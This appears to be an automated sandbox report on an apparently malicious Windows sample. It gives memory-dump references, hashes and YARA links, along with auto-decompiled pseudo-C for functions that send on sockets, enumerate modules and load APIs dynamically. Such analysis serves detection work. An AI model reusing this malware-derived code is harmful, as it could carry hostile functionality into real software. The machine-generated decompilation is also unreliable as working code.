Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: _printf
String ID: 71<$<83$Error: %d$YA
API String ID: 723836530-2713427950
Opcode ID: 3b4fd8cc6928793c613f17f1306d9aac4e5a64e02037005bff0adb9cbd0b2309
Instruction ID: 6a75ed38eb6bd6179fda9b31910452b6ffba3efef10bdf4f1f6792397ea0bacd
Opcode Fuzzy Hash: 3b4fd8cc6928793c613f17f1306d9aac4e5a64e02037005bff0adb9cbd0b2309
Instruction Fuzzy Hash: 7BF23775D257858AEB17CB34C8016D9F775AFA7384F10C3AAE844325A3EB3636D68B04

Uniqueness

Uniqueness Score: -1.00%

Function 007226C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007226EE
Module32First.KERNEL32(00000000,00000224), ref: 0072270E

Memory Dump Source

Source File: 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp, Offset: 00721000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_721000_xw0K5Lahxz.jbxd

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ab43f902f101714737ba7b1e7e05159fc036383c8ffa670c1e2348fd99e812e2
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E4F062322007217BD7203AF5AC8DB6A76E8FF49725F100528E642915C2DA78ED464661

Uniqueness

Uniqueness Score: -1.00%

Function 0040B470 Relevance: .3, Instructions: 264
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E0040B470(signed int __ecx, intOrPtr* __edx, char _a4) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char* _v28;
				signed int _v32;
				signed int _v40;
				char _v41;
				intOrPtr _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t116;
				char _t121;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t135;
				intOrPtr _t143;
				char _t150;
				signed int _t152;
				char _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				char _t174;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t189;
				void* _t190;
				char _t198;
				intOrPtr* _t207;
				intOrPtr _t208;
				intOrPtr _t209;
				void* _t211;
				void* _t212;
				void* _t213;
				intOrPtr* _t214;
				intOrPtr* _t215;
				void* _t216;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t222;
				signed int _t223;
				signed int _t225;

				_t207 = __edx;
				_t225 = (_t223 & 0xfffffff8) - 0x2c;
				_t116 =  *0x41b014; // 0x149e0abf
				_v8 = _t116 ^ _t225;
				_t218 = __ecx;
				if( *((char*)(__ecx + 0x488)) == 0) {
					_t207 =  *((intOrPtr*)(__ecx + 0x10));
					_t177 =  *_t207;
					_v48 = _t177;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) - _t177;
					if(_t170 == 0) {
						L39:
						_t178 = _t218 + 0x288;
						 *_t207 = _t178;
						 *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x20)))) = _t178;
						 *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x30)))) = 0x200;
						_t121 = _a4;
						if(_t121 != 0xffffffff) {
							_pop(_t211);
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x20)))))) = _t121;
							 *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x30)))) - 1;
							_pop(_t219);
							_pop(_t171);
							 *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x20)))) =  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x20)))) + 1;
							return E00412A1E(_t121, _t171, _v8 ^ _t225, _t207, _t211, _t219);
						} else {
							goto L40;
						}
					} else {
						while( *((intOrPtr*)(_t218 + 0x4c0)) != 2) {
							_v40 =  *((intOrPtr*)(_t218 + 0x84));
							_push( &_v32);
							_v32 = _t218;
							_t214 = E00401E20(0x34);
							_t225 = _t225 + 8;
							_t131 =  *((intOrPtr*)(_t218 + 0x50));
							_t208 = 0;
							_t189 = 0;
							if(_t131 != 0) {
								_t208 =  *((intOrPtr*)(_t218 + 0x4c));
								_t189 = _t131;
								asm("lock inc dword [eax+0x8]");
							}
							 *((intOrPtr*)(_t214 + 0x14)) = 0;
							 *((intOrPtr*)(_t214 + 0x18)) = E0040FF70;
							 *_t214 = 0;
							 *((intOrPtr*)(_t214 + 4)) = 0;
							 *((intOrPtr*)(_t214 + 8)) = 0;
							 *((intOrPtr*)(_t214 + 0xc)) = 0;
							 *((intOrPtr*)(_t214 + 0x10)) = 0;
							 *((intOrPtr*)(_t214 + 0x1c)) = 0;
							 *((intOrPtr*)(_t214 + 0x20)) = 0;
							 *((intOrPtr*)(_t214 + 0x24)) = 0;
							if(_t189 == 0) {
								_t75 = _t189 + 8; // 0x8
								_t207 = _t75;
							} else {
								 *((intOrPtr*)(_t214 + 0x20)) = _t208;
								_t73 = _t189 + 8; // 0x8
								_t207 = _t73;
								 *((intOrPtr*)(_t214 + 0x24)) = _t189;
								asm("lock inc dword [edx]");
							}
							 *((intOrPtr*)(_t214 + 0x28)) = _v48;
							 *((intOrPtr*)(_t214 + 0x2c)) = _t170;
							_t133 = _v32;
							 *(_t214 + 0x30) = _t133;
							if(_t189 != 0) {
								asm("lock xadd [edx], eax");
								if((_t133 | 0xffffffff) == 0) {
									 *((intOrPtr*)( *_t189 + 4))();
								}
							}
							_v16 = _v48;
							_t135 = _t218 + 0x44;
							_v20 = _t170;
							_v12 = _t170;
							if(( *(_t218 + 0x48) & 0x00000010) == 0 || _t170 != 0) {
								_t190 = 0;
							} else {
								_t190 = 1;
							}
							E00404AF0(_v40 + 0x14, _t135,  &_v20, 1, _t190, _t190, _t214); // executed
							 *(_t218 + 0x490) = E00412970();
							 *((intOrPtr*)(_t218 + 0x48c)) = 0x2733;
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x84)) + 0xc)) + 8)) + 0x1c)) = 0;
							do {
								E00402C60(_t170,  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x84)) + 0xc)), _t214);
							} while ( *(_t218 + 0x490) == E00412970() &&  *((intOrPtr*)(_t218 + 0x48c)) == 0x2733);
							if( *((intOrPtr*)(_t218 + 0x48c)) != 0) {
								goto L4;
							} else {
								_t143 =  *((intOrPtr*)(_t218 + 0x494));
								if(_t143 > _t170) {
									L38:
									_t207 =  *((intOrPtr*)(_t218 + 0x10));
									goto L39;
								} else {
									_v44 = _v44 + _t143;
									_t170 = _t170 - _t143;
									if(_t170 != 0) {
										continue;
									} else {
										goto L38;
									}
								}
							}
							goto L42;
						}
						goto L3;
					}
				} else {
					_t174 = _a4;
					if(_t174 == 0xffffffff) {
						L40:
						_pop(_t212);
						_pop(_t220);
						_pop(_t172);
						return E00412A1E(0, _t172, _v8 ^ _t225, _t207, _t212, _t220);
					} else {
						if( *((intOrPtr*)(__ecx + 0x4c0)) != 2) {
							_v48 =  *((intOrPtr*)(__ecx + 0x84));
							_push( &_v40);
							_v41 = _t174;
							_v40 = __ecx;
							_t215 = E00401E20(0x34);
							_t225 = _t225 + 8;
							_t150 =  *((intOrPtr*)(_t218 + 0x50));
							_t209 = 0;
							_t198 = 0;
							if(_t150 != 0) {
								_t209 =  *((intOrPtr*)(_t218 + 0x4c));
								_t198 = _t150;
								asm("lock inc dword [eax+0x8]");
							}
							 *((intOrPtr*)(_t215 + 0x14)) = 0;
							 *((intOrPtr*)(_t215 + 0x18)) = E0040FF70;
							 *_t215 = 0;
							 *((intOrPtr*)(_t215 + 4)) = 0;
							 *((intOrPtr*)(_t215 + 8)) = 0;
							 *((intOrPtr*)(_t215 + 0xc)) = 0;
							 *((intOrPtr*)(_t215 + 0x10)) = 0;
							 *((intOrPtr*)(_t215 + 0x1c)) = 0;
							 *((intOrPtr*)(_t215 + 0x20)) = 0;
							 *((intOrPtr*)(_t215 + 0x24)) = 0;
							if(_t198 == 0) {
								_t27 = _t198 + 8; // 0x8
								_t207 = _t27;
							} else {
								 *((intOrPtr*)(_t215 + 0x20)) = _t209;
								_t25 = _t198 + 8; // 0x8
								_t207 = _t25;
								 *((intOrPtr*)(_t215 + 0x24)) = _t198;
								asm("lock inc dword [edx]");
							}
							 *(_t215 + 0x2c) = 1;
							 *((intOrPtr*)(_t215 + 0x28)) =  &_v41;
							_t152 = _v40;
							 *(_t215 + 0x30) = _t152;
							if(_t198 != 0) {
								asm("lock xadd [edx], eax");
								if((_t152 | 0xffffffff) == 0) {
									 *((intOrPtr*)( *_t198 + 4))();
								}
							}
							_v28 =  &_v41;
							_v32 = 1;
							_v24 = 1;
							E00404AF0(_v48 + 0x14, _t218 + 0x44,  &_v32, 1, _t198, 0, _t215);
							 *(_t218 + 0x490) = E00412970();
							 *((intOrPtr*)(_t218 + 0x48c)) = 0x2733;
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x84)) + 0xc)) + 8)) + 0x1c)) = 0;
							asm("o16 nop [eax+eax]");
							do {
								E00402C60(_t174,  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x84)) + 0xc)), _t215);
							} while ( *(_t218 + 0x490) == E00412970() &&  *((intOrPtr*)(_t218 + 0x48c)) == 0x2733);
							if( *((intOrPtr*)(_t218 + 0x48c)) != 0) {
								goto L4;
							} else {
								_pop(_t216);
								_pop(_t222);
								_pop(_t175);
								return E00412A1E(_t174, _t175, _v4 ^ _t225, _t207, _t216, _t222);
							}
						} else {
							L3:
							_t125 = E00412970();
							 *((intOrPtr*)(_t218 + 0x48c)) = 0x3e3;
							 *(_t218 + 0x490) = _t125;
							L4:
							_pop(_t213);
							_pop(_t221);
							_pop(_t173);
							return E00412A1E(_t125 | 0xffffffff, _t173, _v8 ^ _t225, _t207, _t213, _t221);
						}
					}
				}
				L42:
			}

0x0040b470
0x0040b476
0x0040b479
0x0040b480
0x0040b486
0x0040b490
0x0040b63d
0x0040b642
0x0040b644
0x0040b648
0x0040b64a
0x0040b7bd
0x0040b7bd
0x0040b7c3
0x0040b7c8
0x0040b7cd
0x0040b7d3
0x0040b7d9
0x0040b7f4
0x0040b7f7
0x0040b7fc
0x0040b801
0x0040b802
0x0040b803
0x0040b813
0x00000000
0x00000000
0x00000000
0x0040b650
0x0040b650
0x0040b663
0x0040b66b
0x0040b66e
0x0040b677
0x0040b679
0x0040b67c
0x0040b67f
0x0040b681
0x0040b685
0x0040b687
0x0040b68a
0x0040b68c
0x0040b68c
0x0040b690
0x0040b697
0x0040b69e
0x0040b6a4
0x0040b6ab
0x0040b6b2
0x0040b6b9
0x0040b6c0
0x0040b6c7
0x0040b6ce
0x0040b6d7
0x0040b6e7
0x0040b6e7
0x0040b6d9
0x0040b6d9
0x0040b6dc
0x0040b6dc
0x0040b6df
0x0040b6e2
0x0040b6e2
0x0040b6ee
0x0040b6f1
0x0040b6f4
0x0040b6f8
0x0040b6fd
0x0040b702
0x0040b706
0x0040b70a
0x0040b70a
0x0040b706
0x0040b715
0x0040b719
0x0040b71c
0x0040b720
0x0040b724
0x0040b72e
0x0040b72a
0x0040b72a
0x0040b72a
0x0040b742
0x0040b74c
0x0040b754
0x0040b76d
0x0040b770
0x0040b779
0x0040b783
0x0040b79e
0x00000000
0x0040b7a4
0x0040b7a4
0x0040b7ac
0x0040b7ba
0x0040b7ba
0x00000000
0x0040b7ae
0x0040b7ae
0x0040b7b2
0x0040b7b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b7b4
0x0040b7ac
0x00000000
0x0040b79e
0x00000000
0x0040b650
0x0040b496
0x0040b496
0x0040b49c
0x0040b7db
0x0040b7dd
0x0040b7de
0x0040b7df
0x0040b7ee
0x0040b4a2
0x0040b4a9
0x0040b4dd
0x0040b4e5
0x0040b4e8
0x0040b4ec
0x0040b4f5
0x0040b4f7
0x0040b4fa
0x0040b4fd
0x0040b4ff
0x0040b503
0x0040b505
0x0040b508
0x0040b50a
0x0040b50a
0x0040b50e
0x0040b515
0x0040b51c
0x0040b522
0x0040b529
0x0040b530
0x0040b537
0x0040b53e
0x0040b545
0x0040b54c
0x0040b555
0x0040b565
0x0040b565
0x0040b557
0x0040b557
0x0040b55a
0x0040b55a
0x0040b55d
0x0040b560
0x0040b560
0x0040b568
0x0040b573
0x0040b576
0x0040b57a
0x0040b57f
0x0040b584
0x0040b588
0x0040b58c
0x0040b58c
0x0040b588
0x0040b59b
0x0040b5a8
0x0040b5b4
0x0040b5bd
0x0040b5c7
0x0040b5cf
0x0040b5e8
0x0040b5ea
0x0040b5f0
0x0040b5f9
0x0040b603
0x0040b61e
0x00000000
0x0040b624
0x0040b626
0x0040b627
0x0040b628
0x0040b637
0x0040b637
0x0040b4ab
0x0040b4ab
0x0040b4ab
0x0040b4b0
0x0040b4ba
0x0040b4c0
0x0040b4c3
0x0040b4c4
0x0040b4c5
0x0040b4d4
0x0040b4d4
0x0040b4a9
0x0040b49c
0x00000000

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 313c9522d7ebfbb98c0201bcded6e7a30d3ae0d97af845af3ef63ff36ecdd814
Instruction ID: f6813975ca9571ec6b75824e2e1171f9e2c5cc39e07285f4e71987b79d650fe4
Opcode Fuzzy Hash: 313c9522d7ebfbb98c0201bcded6e7a30d3ae0d97af845af3ef63ff36ecdd814
Instruction Fuzzy Hash: 59B149B42047019FD324CF25C494B57B7E0FF88328F048A2EE59A9B791DB79A845CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00412A58 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00412A58(_Unknown_base(*)()* __edi, void* __esi) {
				struct HINSTANCE__* _t2;
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x41e1d0, 0xfa0);
				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_t14 = _t2;
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x41e1cc = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x41e1e8 = _t11;
						 *0x41e1ec = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E004133F6(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x41e1d0);
						_t7 =  *0x41e1cc; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}

0x00412a58
0x00412a59
0x00412a64
0x00412a6f
0x00412a75
0x00412a79
0x00412a8c
0x00412a9e
0x00412aa0
0x00412aa8
0x00412ac3
0x00412ac9
0x00412ad0
0x00000000
0x00000000
0x00000000
0x00000000
0x00412aae
0x00412aae
0x00412ab4
0x00412ab9
0x00412abb
0x00412abb
0x00412a7b
0x00412a86
0x00412a8a
0x00412ad2
0x00412ad4
0x00412ad9
0x00412adf
0x00412ae5
0x00412aec
0x00000000
0x00412aef
0x00412af5
0x00000000
0x00000000
0x00000000
0x00412a8a

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0041E1D0,00000FA0,?,?,00412A36), ref: 00412A64
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00412A36), ref: 00412A6F
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00412A36), ref: 00412A80
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00412A92
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00412AA0
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00412A36), ref: 00412AC3
DeleteCriticalSection.KERNEL32(0041E1D0,00000007,?,?,00412A36), ref: 00412ADF
CloseHandle.KERNEL32(00000000,?,?,00412A36), ref: 00412AEF

Strings

SleepConditionVariableCS, xrefs: 00412A8C
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00412A6A
WakeAllConditionVariable, xrefs: 00412A98
kernel32.dll, xrefs: 00412A7B

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 0ec4e18bfa7a0c1d01b1ae9533845ee1a2cfe6d283c1dad492f1bbe303e8e81c
Instruction ID: 48936d8197a76f350e6656be33a645ac9cb408f952729d8653b5d317cb108cb3
Opcode Fuzzy Hash: 0ec4e18bfa7a0c1d01b1ae9533845ee1a2cfe6d283c1dad492f1bbe303e8e81c
Instruction Fuzzy Hash: B5017535A40A11FFD7215BB2AD0DFDB3E98AF887517158036FD05D6250DAB8C880CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0 Relevance: 15.1, APIs: 10, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00402FB0(signed char* __ecx, signed char* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed char* _t23;
				intOrPtr _t24;
				intOrPtr _t27;
				signed char* _t31;
				intOrPtr _t32;
				char* _t35;
				signed char* _t37;
				signed char* _t38;
				intOrPtr* _t43;
				signed int _t46;

				_t42 = __edx;
				_t21 =  *0x41b014; // 0x149e0abf
				_v8 = _t21 ^ _t46;
				_t23 = __ecx;
				_t44 = __edx;
				_t36 = 0;
				_v20 = __edx;
				_v16 = __ecx;
				_t43 = _a8;
				if(__ecx == 0xffffffff) {
					L12:
					_t24 = E00412970();
					 *_t43 = 0;
					 *((intOrPtr*)(_t43 + 4)) = _t24;
					L13:
					return E00412A1E(_t36, _t36, _v8 ^ _t46, _t42, _t43, _t44);
				}
				if(_a4 == 0 || ( *__edx & 0x00000008) == 0) {
					_t37 = _t23;
				} else {
					_v12 = 0;
					E00412970();
					 *__edx =  *__edx | 0x00000008;
					__imp__#112(0);
					_t37 = _v16;
					_t35 =  &_v12;
					__imp__#21(_t37, 0xffff, 0x80, _t35, 4);
					_t23 = E00412970();
					__imp__#111();
					if(_t35 == 0) {
						_t23 = E00412970();
					}
				}
				__imp__#112(0);
				__imp__#3(_t37); // executed
				_t36 = _t23;
				_t27 = E00412970();
				_t44 = _t27;
				__imp__#111();
				 *_t43 = _t27;
				 *((intOrPtr*)(_t43 + 4)) = _t27;
				if(_t23 == 0) {
					goto L12;
				} else {
					if( *((intOrPtr*)(_t43 + 4)) != E00412970() ||  *_t43 != 0x2733) {
						if( *((intOrPtr*)(_t43 + 4)) != E00412970() ||  *_t43 != 0x4d5) {
							goto L13;
						} else {
							goto L11;
						}
					} else {
						L11:
						_t38 = _v16;
						_v12 = 0;
						__imp__#10(_t38, 0x8004667e,  &_v12);
						_t31 = _v20;
						 *_t31 =  *_t31 & 0x000000fc;
						__imp__#112(0);
						__imp__#3(_t38);
						_t36 = _t31;
						_t32 = E00412970();
						_t44 = _t32;
						__imp__#111();
						 *_t43 = _t32;
						 *((intOrPtr*)(_t43 + 4)) = _t32;
						if(_t31 != 0) {
							goto L13;
						}
						goto L12;
					}
				}
			}

0x00402fb0
0x00402fb6
0x00402fbd
0x00402fc2
0x00402fc4
0x00402fc6
0x00402fc8
0x00402fcb
0x00402fcf
0x00402fd5
0x004030bf
0x004030bf
0x004030c4
0x004030ca
0x004030cd
0x004030df
0x004030df
0x00402fde
0x0040302b
0x00402fe5
0x00402fe7
0x00402fea
0x00402fef
0x00402ff3
0x00402ff9
0x00402ffc
0x0040300d
0x00403015
0x0040301a
0x00403022
0x00403024
0x00403024
0x00403022
0x0040302f
0x00403036
0x0040303c
0x0040303e
0x00403043
0x00403045
0x0040304b
0x0040304d
0x00403052
0x00000000
0x00403054
0x0040305c
0x0040306e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403078
0x00403078
0x00403078
0x00403085
0x0040308c
0x00403092
0x00403097
0x0040309a
0x004030a1
0x004030a7
0x004030a9
0x004030ae
0x004030b0
0x004030b6
0x004030b8
0x004030bd
0x00000000
0x00000000
0x00000000
0x004030bd
0x0040305c

APIs

WSASetLastError.WS2_32(00000000), ref: 00402FF3
setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040300D
WSAGetLastError.WS2_32 ref: 0040301A
WSASetLastError.WS2_32(00000000), ref: 0040302F
closesocket.WS2_32 ref: 00403036
WSAGetLastError.WS2_32 ref: 00403045
ioctlsocket.WS2_32(?,8004667E,?), ref: 0040308C
WSASetLastError.WS2_32(00000000), ref: 0040309A
closesocket.WS2_32(?), ref: 004030A1
WSAGetLastError.WS2_32 ref: 004030B0

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLast$closesocket$ioctlsocketsetsockopt
String ID:
API String ID: 136865605-0
Opcode ID: 02c0085a5617bf288e366fd4f9cf009be4c87ef28dd8098db7908175d72e5ecb
Instruction ID: f2351e9be6b5591ad08ade296da4792935732e02a65ef0db74d16016341de9d9
Opcode Fuzzy Hash: 02c0085a5617bf288e366fd4f9cf009be4c87ef28dd8098db7908175d72e5ecb
Instruction Fuzzy Hash: FA31B6B1A11706EBD710AFB4C9847DABBA8EF04315F00827BE510E7391DBB849548B59

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0 Relevance: 13.6, APIs: 9, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00404AF0(struct _CRITICAL_SECTION* __ecx, intOrPtr* _a4, struct _CRITICAL_SECTION* _a8, intOrPtr _a12, char _a20, struct _OVERLAPPED* _a24) {
				signed int _v8;
				long _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr _t59;
				long _t60;
				struct _OVERLAPPED* _t64;
				struct _CRITICAL_SECTION** _t65;
				struct _OVERLAPPED* _t68;
				long _t69;
				struct _OVERLAPPED* _t70;
				struct _CRITICAL_SECTION* _t71;
				intOrPtr* _t73;
				struct _CRITICAL_SECTION* _t83;
				struct _OVERLAPPED* _t85;
				void* _t86;
				intOrPtr _t89;
				void* _t90;
				struct _CRITICAL_SECTION* _t92;
				struct _CRITICAL_SECTION* _t93;
				signed int _t94;

				_t55 =  *0x41b014; // 0x149e0abf
				_v8 = _t55 ^ _t94;
				_t83 = _a8;
				_t71 = __ecx;
				_t73 = _a4;
				_t85 = _a24;
				asm("lock inc dword [eax]");
				if(_a20 == 0) {
					_t59 =  *_t73;
					if(_t59 != 0xffffffff) {
						_v12 = 0;
						__imp__WSASend(_t59, _t83, _a12,  &_v12, 0, _t85, 0); // executed
						__imp__#111();
						_t60 =  ==  ? 0x274d : _t59;
						_v16 = _t60;
						if(_t59 == 0 || _t60 == 0x3e5) {
							_t89 =  *((intOrPtr*)(_t71 + 4));
							_t71 = 1;
							_t61 = 0;
							_t83 = 1;
							asm("lock cmpxchg [ecx], edx");
							if(0 == 1) {
								_t61 = PostQueuedCompletionStatus( *(_t89 + 0x14), 0, 2, _t85);
								if(0 == 0) {
									EnterCriticalSection(_t89 + 0x38);
									 *(_t85 + 0x14) = 0;
									_t64 =  *(_t89 + 0x58);
									if(_t64 == 0) {
										 *(_t89 + 0x54) = _t85;
									} else {
										 *(_t64 + 0x14) = _t85;
									}
									 *(_t89 + 0x58) = _t85;
									_t65 = _t89 + 0x34;
									_t52 = _t71;
									_t71 =  *_t65;
									 *_t65 = _t52;
									_t61 = _t89 + 0x38;
									LeaveCriticalSection(_t89 + 0x38);
									goto L22;
								}
							}
						} else {
							_t71 =  *(__ecx + 4);
							 *(_t85 + 0x1c) = 1;
							_t85->Internal = E00412970();
							_t85->Offset = _v16;
							_t85->OffsetHigh = _v12;
							if(PostQueuedCompletionStatus( *(_t71 + 0x14), 0, 2, _t85) == 0) {
								_t92 = _t71 + 0x38;
								EnterCriticalSection(_t92);
								 *(_t85 + 0x14) = 0;
								_t68 =  *(_t71 + 0x58);
								if(_t68 == 0) {
									 *(_t71 + 0x54) = _t85;
								} else {
									 *(_t68 + 0x14) = _t85;
								}
								 *(_t71 + 0x58) = _t85;
								_t61 = _t71 + 0x34;
								 *(_t71 + 0x34) = 1;
								LeaveCriticalSection(_t92);
								goto L22;
							}
						}
					} else {
						_t93 =  *(__ecx + 4);
						 *(_t85 + 0x1c) = 1;
						_t69 = E00412970();
						_t85->Offset = 0x2719;
						goto L2;
					}
				} else {
					_t93 =  *(__ecx + 4);
					 *(_t85 + 0x1c) = 1;
					_t69 = E00412970();
					_t85->Offset = 0;
					L2:
					_t85->Internal = _t69;
					_t85->OffsetHigh = 0;
					if(PostQueuedCompletionStatus( *(_t93 + 0x14), 0, 2, _t85) == 0) {
						_t71 = _t93 + 0x38;
						EnterCriticalSection(_t71);
						 *(_t85 + 0x14) = 0;
						_t70 =  *(_t93 + 0x58);
						if(_t70 == 0) {
							 *(_t93 + 0x54) = _t85;
						} else {
							 *(_t70 + 0x14) = _t85;
						}
						 *(_t93 + 0x58) = _t85;
						_t61 = _t93 + 0x34;
						 *(_t93 + 0x34) = 1;
						LeaveCriticalSection(_t71);
						L22:
					}
				}
				_pop(_t86);
				_pop(_t90);
				return E00412A1E(_t61, _t71, _v8 ^ _t94, _t83, _t86, _t90);
			}

0x00404af6
0x00404afd
0x00404b00
0x00404b04
0x00404b06
0x00404b0b
0x00404b14
0x00404b1b
0x00404b85
0x00404b8a
0x00404bac
0x00404bb9
0x00404bc1
0x00404bd1
0x00404bd4
0x00404bd9
0x00404c45
0x00404c4b
0x00404c50
0x00404c52
0x00404c54
0x00404c5a
0x00404c64
0x00404c6c
0x00404c72
0x00404c78
0x00404c7f
0x00404c84
0x00404c8b
0x00404c86
0x00404c86
0x00404c86
0x00404c8e
0x00404c91
0x00404c94
0x00404c94
0x00404c94
0x00404c96
0x00404c9a
0x00000000
0x00404c9a
0x00404c6c
0x00404be2
0x00404be2
0x00404be8
0x00404bf7
0x00404bfe
0x00404c01
0x00404c0f
0x00404c15
0x00404c19
0x00404c1f
0x00404c26
0x00404c2b
0x00404c32
0x00404c2d
0x00404c2d
0x00404c2d
0x00404c35
0x00404c38
0x00404c40
0x00404c9a
0x00000000
0x00404c9a
0x00404c0f
0x00404b8c
0x00404b8c
0x00404b8f
0x00404b96
0x00404b9b
0x00000000
0x00404b9b
0x00404b1d
0x00404b1d
0x00404b20
0x00404b27
0x00404b2c
0x00404b33
0x00404b38
0x00404b3a
0x00404b4c
0x00404b52
0x00404b56
0x00404b5c
0x00404b63
0x00404b68
0x00404b6f
0x00404b6a
0x00404b6a
0x00404b6a
0x00404b72
0x00404b75
0x00404b7d
0x00404c9a
0x00404c9a
0x00404c9a
0x00404b4c
0x00404ca3
0x00404ca4
0x00404cb0

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00404B44
EnterCriticalSection.KERNEL32(?), ref: 00404B56
WSASend.WS2_32(?,?,?,?,00000000,?,00000000), ref: 00404BB9
WSAGetLastError.WS2_32 ref: 00404BC1
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00404C07
EnterCriticalSection.KERNEL32(?), ref: 00404C19
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00404C64
EnterCriticalSection.KERNEL32(?), ref: 00404C72
LeaveCriticalSection.KERNEL32(?), ref: 00404C9A

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

